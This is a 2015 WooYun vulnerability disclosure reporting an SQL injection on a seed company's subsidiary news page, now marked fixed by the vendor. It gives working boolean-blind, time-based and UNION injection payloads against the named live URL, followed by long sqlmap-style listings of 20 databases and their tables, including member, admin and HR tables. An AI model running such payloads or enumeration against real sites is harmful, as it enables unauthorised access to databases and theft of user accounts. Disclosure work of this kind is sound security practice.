当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153272

漏洞标题:阿哥汇分站存在SQL注射漏洞(涉及20库/599表/所有账户密码)

相关厂商:北京士惠农业发展有限公司

漏洞作者: 路人甲

提交时间:2015-11-10 13:54

修复时间:2015-11-20 19:03

公开时间:2015-11-20 19:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-20: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

涉及所有账号跟密码 可进一步利用

详细说明:

主站

http://www.agrite.com.cn


分站存在注入
id

http://www.originseed.com.cn/news/view.php?id=894


单引号错误

1.jpg


'and '1'='1 正常

2.jpg


---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.originseed.com.cn:80/news/view.php?id=894' AND 7495=7495 AND 'rYBa'='rYBa
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.originseed.com.cn:80/news/view.php?id=894' AND (SELECT * FROM (SELECT(SLEEP(5)))aTkT) AND 'rXKJ'
='rXKJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.originseed.com.cn:80/news/view.php?id=-1455' UNION ALL SELECT NULL,CONCAT(0x716a7a7a71,0x6949425
3477a78424256,0x716a6a6271),NULL,NULL--
---

漏洞证明:

available databases [20]:
[*] cdcol
[*] daizhuang
[*] dict
[*] discuz
[*] information_schema
[*] mambo
[*] mysql
[*] OriginChangchun
[*] OriginHr
[*] OriginPro
[*] originseed
[*] OriginWeb
[*] performance_schema
[*] phpmyadmin
[*] rbac
[*] seed
[*] sino
[*] test
[*] ttq
[*] ucenter


Database: cdcol
[1 table]
+----------------------------------------------+
| cds                                          |
+----------------------------------------------+
Database: phpmyadmin
[10 tables]
+----------------------------------------------+
| pma_bookmark                                 |
| pma_column_info                              |
| pma_designer_coords                          |
| pma_history                                  |
| pma_pdf_pages                                |
| pma_relation                                 |
| pma_table_coords                             |
| pma_table_info                               |
| pma_tracking                                 |
| pma_userconfig                               |
+----------------------------------------------+
Database: ttq
[108 tables]
+----------------------------------------------+
| sdb_admin_roles                              |
| sdb_advance_logs                             |
| sdb_articles                                 |
| sdb_autosync_rule                            |
| sdb_autosync_rule_relation                   |
| sdb_autosync_task                            |
| sdb_brand                                    |
| sdb_cachemgr                                 |
| sdb_comments                                 |
| sdb_cost_sync                                |
| sdb_coupons                                  |
| sdb_coupons_p_items                          |
| sdb_coupons_u_items                          |
| sdb_ctlmap                                   |
| sdb_currency                                 |
| sdb_dapi                                     |
| sdb_dbver                                    |
| sdb_delivery                                 |
| sdb_delivery_item                            |
| sdb_dly_area                                 |
| sdb_dly_center                               |
| sdb_dly_corp                                 |
| sdb_dly_h_area                               |
| sdb_dly_type                                 |
| sdb_gift                                     |
| sdb_gift_cat                                 |
| sdb_gift_items                               |
| sdb_gimages                                  |
| sdb_gnotify                                  |
| sdb_goods                                    |
| sdb_goods_cat                                |
| sdb_goods_keywords                           |
| sdb_goods_lv_price                           |
| sdb_goods_memo                               |
| sdb_goods_rate                               |
| sdb_goods_spec_index                         |
| sdb_goods_type                               |
| sdb_goods_type_spec                          |
| sdb_goods_virtual_cat                        |
| sdb_gtask                                    |
| sdb_image_sync                               |
| sdb_job_apilist                              |
| sdb_job_data_sync                            |
| sdb_job_goods_download                       |
| sdb_link                                     |
| sdb_lnk_acts                                 |
| sdb_lnk_roles                                |
| sdb_magicvars                                |
| sdb_member_addrs                             |
| sdb_member_attr                              |
| sdb_member_coupon                            |
| sdb_member_lv                                |
| sdb_member_mattrvalue                        |
| sdb_members                                  |
| sdb_message                                  |
| sdb_msgqueue                                 |
| sdb_op_sessions                              |
| sdb_operators                                |
| sdb_order_items                              |
| sdb_order_log                                |
| sdb_order_pmt                                |
| sdb_orders                                   |
| sdb_package_product                          |
| sdb_pages                                    |
| sdb_payment_cfg                              |
| sdb_payments                                 |
| sdb_plugins                                  |
| sdb_pmt_gen_coupon                           |
| sdb_pmt_goods                                |
| sdb_pmt_goods_cat                            |
| sdb_pmt_member_lv                            |
| sdb_point_history                            |
| sdb_print_tmpl                               |
| sdb_product_memo                             |
| sdb_products                                 |
| sdb_promotion                                |
| sdb_promotion_activity                       |
| sdb_promotion_scheme                         |
| sdb_pub_files                                |
| sdb_refunds                                  |
| sdb_regions                                  |
| sdb_return_product                           |
| sdb_sell_logs                                |
| sdb_sendbox                                  |
| sdb_seo                                      |
| sdb_settings                                 |
| sdb_sfiles                                   |
| sdb_sitemaps                                 |
| sdb_spec_values                              |
| sdb_specification                            |
| sdb_status                                   |
| sdb_supplier                                 |
| sdb_supplier_pdtbn                           |
| sdb_sync_tmp                                 |
| sdb_systmpl                                  |
| sdb_tag_rel                                  |
| sdb_tags                                     |
| sdb_taobao_goods_goods                       |
| sdb_tb_order_ctl_order_items                 |
| sdb_tb_order_ctl_orders                      |
| sdb_tb_order_ctl_regions                     |
| sdb_tb_sales_download_sell_log               |
| sdb_template_relation                        |
| sdb_themes                                   |
| sdb_tpl_source                               |
| sdb_triggers                                 |
| sdb_type_brand                               |
| sdb_widgets_set                              |
+----------------------------------------------+
Database: originseed
[12 tables]
+----------------------------------------------+
| OriginWeb_action                             |
| OriginWeb_annex                              |
| OriginWeb_class                              |
| OriginWeb_cn_class                           |
| OriginWeb_cn_feedback                        |
| OriginWeb_cn_menu                            |
| OriginWeb_manage_menu                        |
| OriginWeb_menu_type                          |
| OriginWeb_photo                              |
| OriginWeb_power                              |
| OriginWeb_user                               |
| OriginWeb_usergroup                          |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: ucenter
[19 tables]
+----------------------------------------------+
| uc_admins                                    |
| uc_applications                              |
| uc_badwords                                  |
| uc_domains                                   |
| uc_failedlogins                              |
| uc_feeds                                     |
| uc_friends                                   |
| uc_mailqueue                                 |
| uc_memberfields                              |
| uc_members                                   |
| uc_mergemembers                              |
| uc_newpm                                     |
| uc_notelist                                  |
| uc_pms                                       |
| uc_protectedmembers                          |
| uc_settings                                  |
| uc_sqlcache                                  |
| uc_tags                                      |
| uc_vars                                      |
+----------------------------------------------+
Database: daizhuang
[20 tables]
+----------------------------------------------+
| seed_action                                  |
| seed_catalog                                 |
| seed_center                                  |
| seed_company                                 |
| seed_contrast                                |
| seed_daizhuang_data                          |
| seed_exid                                    |
| seed_farmer                                  |
| seed_login                                   |
| seed_menu                                    |
| seed_power                                   |
| seed_price                                   |
| seed_product                                 |
| seed_rice_contrast                           |
| seed_rice_daizhuang_data                     |
| seed_rice_exid                               |
| seed_rice_farmer                             |
| seed_user                                    |
| seed_usergroup                               |
| seed_zoology                                 |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: discuz
[103 tables]
+----------------------------------------------+
| cdb_access                                   |
| cdb_activities                               |
| cdb_activityapplies                          |
| cdb_addons                                   |
| cdb_adminactions                             |
| cdb_admincustom                              |
| cdb_admingroups                              |
| cdb_adminnotes                               |
| cdb_adminsessions                            |
| cdb_advertisements                           |
| cdb_announcements                            |
| cdb_attachmentfields                         |
| cdb_attachments                              |
| cdb_attachpaymentlog                         |
| cdb_attachtypes                              |
| cdb_banned                                   |
| cdb_bbcodes                                  |
| cdb_caches                                   |
| cdb_creditslog                               |
| cdb_crons                                    |
| cdb_debateposts                              |
| cdb_debates                                  |
| cdb_failedlogins                             |
| cdb_faqs                                     |
| cdb_favoriteforums                           |
| cdb_favorites                                |
| cdb_favoritethreads                          |
| cdb_feeds                                    |
| cdb_forumfields                              |
| cdb_forumlinks                               |
| cdb_forumrecommend                           |
| cdb_forums                                   |
| cdb_imagetypes                               |
| cdb_invites                                  |
| cdb_itempool                                 |
| cdb_magiclog                                 |
| cdb_magicmarket                              |
| cdb_magics                                   |
| cdb_medallog                                 |
| cdb_medals                                   |
| cdb_memberfields                             |
| cdb_membermagics                             |
| cdb_memberrecommend                          |
| cdb_members                                  |
| cdb_memberspaces                             |
| cdb_moderators                               |
| cdb_modworks                                 |
| cdb_mytasks                                  |
| cdb_navs                                     |
| cdb_onlinelist                               |
| cdb_onlinetime                               |
| cdb_orders                                   |
| cdb_paymentlog                               |
| cdb_pluginhooks                              |
| cdb_plugins                                  |
| cdb_pluginvars                               |
| cdb_polloptions                              |
| cdb_polls                                    |
| cdb_postposition                             |
| cdb_posts                                    |
| cdb_profilefields                            |
| cdb_projects                                 |
| cdb_promotions                               |
| cdb_prompt                                   |
| cdb_promptmsgs                               |
| cdb_prompttype                               |
| cdb_ranks                                    |
| cdb_ratelog                                  |
| cdb_regips                                   |
| cdb_relatedthreads                           |
| cdb_reportlog                                |
| cdb_request                                  |
| cdb_rewardlog                                |
| cdb_rsscaches                                |
| cdb_searchindex                              |
| cdb_sessions                                 |
| cdb_settings                                 |
| cdb_smilies                                  |
| cdb_spacecaches                              |
| cdb_stats                                    |
| cdb_statvars                                 |
| cdb_styles                                   |
| cdb_stylevars                                |
| cdb_tags                                     |
| cdb_tasks                                    |
| cdb_taskvars                                 |
| cdb_templates                                |
| cdb_threads                                  |
| cdb_threadsmod                               |
| cdb_threadtags                               |
| cdb_threadtypes                              |
| cdb_tradecomments                            |
| cdb_tradelog                                 |
| cdb_tradeoptionvars                          |
| cdb_trades                                   |
| cdb_typemodels                               |
| cdb_typeoptions                              |
| cdb_typeoptionvars                           |
| cdb_typevars                                 |
| cdb_usergroups                               |
| cdb_validating                               |
| cdb_warnings                                 |
| cdb_words                                    |
+----------------------------------------------+
Database: rbac
[8 tables]
+----------------------------------------------+
| group                                        |
| user                                         |
| operation                                    |
| rl_group_role                                |
| rl_role_operation                            |
| rl_user_group                                |
| rl_user_role                                 |
| role                                         |
+----------------------------------------------+
Database: sino
[11 tables]
+----------------------------------------------+
| sino_action                                  |
| sino_area                                    |
| sino_center                                  |
| sino_hospital                                |
| sino_hospital_update                         |
| sino_login                                   |
| sino_menu                                    |
| sino_power                                   |
| sino_powerprovince                           |
| sino_user                                    |
| sino_usergroup                               |
+----------------------------------------------+
Database: seed
[12 tables]
+----------------------------------------------+
| menu                                         |
| seed_center                                  |
| seed_company                                 |
| seed_contrast                                |
| seed_daizhuang_data                          |
| seed_exid                                    |
| seed_farmer                                  |
| seed_lan                                     |
| seed_product                                 |
| seed_product_ck                              |
| seed_user                                    |
| seed_zoology                                 |
+----------------------------------------------+
Database: OriginHr
[39 tables]
+----------------------------------------------+
| OriginHr_action                              |
| OriginHr_bxbiangeng                          |
| OriginHr_bxmonthdata                         |
| OriginHr_center                              |
| OriginHr_class                               |
| OriginHr_company                             |
| OriginHr_contract                            |
| OriginHr_depart                              |
| OriginHr_depart1                             |
| OriginHr_domicile_class                      |
| OriginHr_dtemp                               |
| OriginHr_dtservice                           |
| OriginHr_emp                                 |
| OriginHr_examination                         |
| OriginHr_fangtan                             |
| OriginHr_heding                              |
| OriginHr_hire_info                           |
| OriginHr_insurance                           |
| OriginHr_jiaban                              |
| OriginHr_jiangcheng                          |
| OriginHr_jianzhi                             |
| OriginHr_jitijiangcheng                      |
| OriginHr_kaoqin                              |
| OriginHr_menu                                |
| OriginHr_monthdata                           |
| OriginHr_nianjia                             |
| OriginHr_power                               |
| OriginHr_powercenter                         |
| OriginHr_powerdetail                         |
| OriginHr_property                            |
| OriginHr_qingjia                             |
| OriginHr_ruzhi                               |
| OriginHr_tiaoxiu                             |
| OriginHr_train                               |
| OriginHr_transfer                            |
| OriginHr_user                                |
| OriginHr_usergroup                           |
| OriginHr_work_class                          |
| OriginHr_zhuanzheng                          |
+----------------------------------------------+
Database: OriginWeb
[12 tables]
+----------------------------------------------+
| OriginWeb_class                              |
| OriginWeb_class_type                         |
| OriginWeb_cn_banner                          |
| OriginWeb_cn_class                           |
| OriginWeb_cn_feedback                        |
| OriginWeb_cn_menu                            |
| OriginWeb_group                              |
| OriginWeb_manage_menu                        |
| OriginWeb_menu                               |
| OriginWeb_three_menu                         |
| OriginWeb_twain_menu                         |
| OriginWeb_user                               |
+----------------------------------------------+
Database: mambo
[39 tables]
+----------------------------------------------+
| mos_banner                                   |
| mos_bannerclient                             |
| mos_bannerfinish                             |
| mos_categories                               |
| mos_components                               |
| mos_contact_details                          |
| mos_content                                  |
| mos_content_frontpage                        |
| mos_content_rating                           |
| mos_core_acl_aro                             |
| mos_core_acl_aro_groups                      |
| mos_core_acl_aro_sections                    |
| mos_core_acl_groups_aro_map                  |
| mos_core_log_items                           |
| mos_core_log_searches                        |
| mos_groups                                   |
| mos_mambots                                  |
| mos_mamhoo                                   |
| mos_mamhoo_config                            |
| mos_mamhoo_salt                              |
| mos_mamhooks                                 |
| mos_menu                                     |
| mos_messages                                 |
| mos_messages_cfg                             |
| mos_modules                                  |
| mos_modules_menu                             |
| mos_newsfeeds                                |
| mos_poll_data                                |
| mos_poll_date                                |
| mos_poll_menu                                |
| mos_polls                                    |
| mos_sections                                 |
| mos_session                                  |
| mos_stats_agents                             |
| mos_template_positions                       |
| mos_templates_menu                           |
| mos_users                                    |
| mos_usertypes                                |
| mos_weblinks                                 |
+----------------------------------------------+
Database: dict
[1 table]
+----------------------------------------------+
| sentence                                     |
+----------------------------------------------+
Database: OriginChangchun
[100 tables]
+----------------------------------------------+
| v9_admin                                     |
| v9_admin_panel                               |
| v9_admin_role                                |
| v9_admin_role_priv                           |
| v9_announce                                  |
| v9_attachment                                |
| v9_attachment_index                          |
| v9_badword                                   |
| v9_block                                     |
| v9_block_history                             |
| v9_block_priv                                |
| v9_cache                                     |
| v9_category                                  |
| v9_category_priv                             |
| v9_collection_content                        |
| v9_collection_history                        |
| v9_collection_node                           |
| v9_collection_program                        |
| v9_comment                                   |
| v9_comment_check                             |
| v9_comment_data_1                            |
| v9_comment_setting                           |
| v9_comment_table                             |
| v9_content_check                             |
| v9_copyfrom                                  |
| v9_datacall                                  |
| v9_dbsource                                  |
| v9_download                                  |
| v9_download_data                             |
| v9_downservers                               |
| v9_extend_setting                            |
| v9_favorite                                  |
| v9_hits                                      |
| v9_ipbanned                                  |
| v9_keylink                                   |
| v9_keyword                                   |
| v9_keyword_data                              |
| v9_link                                      |
| v9_linkage                                   |
| v9_log                                       |
| v9_member                                    |
| v9_member_detail                             |
| v9_member_group                              |
| v9_member_menu                               |
| v9_member_verify                             |
| v9_member_vip                                |
| v9_menu                                      |
| v9_message                                   |
| v9_message_data                              |
| v9_message_group                             |
| v9_model                                     |
| v9_model_field                               |
| v9_module                                    |
| v9_mood                                      |
| v9_news                                      |
| v9_news_data                                 |
| v9_page                                      |
| v9_pay_account                               |
| v9_pay_payment                               |
| v9_pay_spend                                 |
| v9_picture                                   |
| v9_picture_data                              |
| v9_position                                  |
| v9_position_data                             |
| v9_poster                                    |
| v9_poster_201305                             |
| v9_poster_201306                             |
| v9_poster_space                              |
| v9_queue                                     |
| v9_release_point                             |
| v9_search                                    |
| v9_search_keyword                            |
| v9_session                                   |
| v9_site                                      |
| v9_sms_report                                |
| v9_special                                   |
| v9_special_c_data                            |
| v9_special_content                           |
| v9_sphinx_counter                            |
| v9_sso_admin                                 |
| v9_sso_applications                          |
| v9_sso_members                               |
| v9_sso_messagequeue                          |
| v9_sso_session                               |
| v9_sso_settings                              |
| v9_tag                                       |
| v9_template_bak                              |
| v9_times                                     |
| v9_type                                      |
| v9_urlrule                                   |
| v9_video                                     |
| v9_video_content                             |
| v9_video_data                                |
| v9_video_store                               |
| v9_vote_data                                 |
| v9_vote_option                               |
| v9_vote_subject                              |
| v9_wap                                       |
| v9_wap_type                                  |
| v9_workflow                                  |
+----------------------------------------------+
Database: OriginPro
[26 tables]
+----------------------------------------------+
| OriginHr_action                              |
| OriginHr_center                              |
| OriginHr_class                               |
| OriginHr_company                             |
| OriginHr_contract                            |
| OriginHr_depart                              |
| OriginHr_domicile_class                      |
| OriginHr_menu                                |
| OriginHr_power                               |
| OriginHr_powercenter                         |
| OriginHr_powerdetail                         |
| OriginHr_property                            |
| OriginHr_ptcixiongsui                        |
| OriginHr_ptexptype                           |
| OriginHr_pthuaqi                             |
| OriginHr_ptitem                              |
| OriginHr_ptjichan                            |
| OriginHr_ptjidi                              |
| OriginHr_ptkaozhong                          |
| OriginHr_ptmiaoqi                            |
| OriginHr_ptqinbentype                        |
| OriginHr_ptshengyu                           |
| OriginHr_ptzhizhu                            |
| OriginHr_user                                |
| OriginHr_usergroup                           |
| OriginHr_work_class                          |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+


账号 密码

3.jpg

修复方案:

有gift吗

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-11 09:52

厂商回复:

感谢路人甲无私的奉献

最新状态:

2015-11-20:已修复